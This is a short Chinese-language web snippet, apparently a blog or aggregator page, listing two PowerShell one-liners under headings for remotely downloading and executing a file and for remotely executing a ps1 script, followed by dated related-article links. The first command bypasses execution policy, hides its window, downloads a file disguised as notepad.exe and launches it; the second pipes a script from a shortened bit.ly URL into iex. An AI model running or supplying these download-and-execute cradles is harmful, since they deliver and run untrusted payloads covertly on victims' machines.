远程下载文件到本地并执行
cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepad.exe
远程执行ps1脚本
powershell -nop -"iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

 


 

相关文章:

  • 2021-07-14
  • 2021-08-12
  • 2022-02-16
  • 2022-12-23
  • 2022-12-23
  • 2021-05-29
  • 2022-12-23
猜你喜欢
  • 2021-11-08
  • 2021-09-03
  • 2021-06-26
  • 2022-01-24
  • 2022-12-23
相关资源
相似解决方案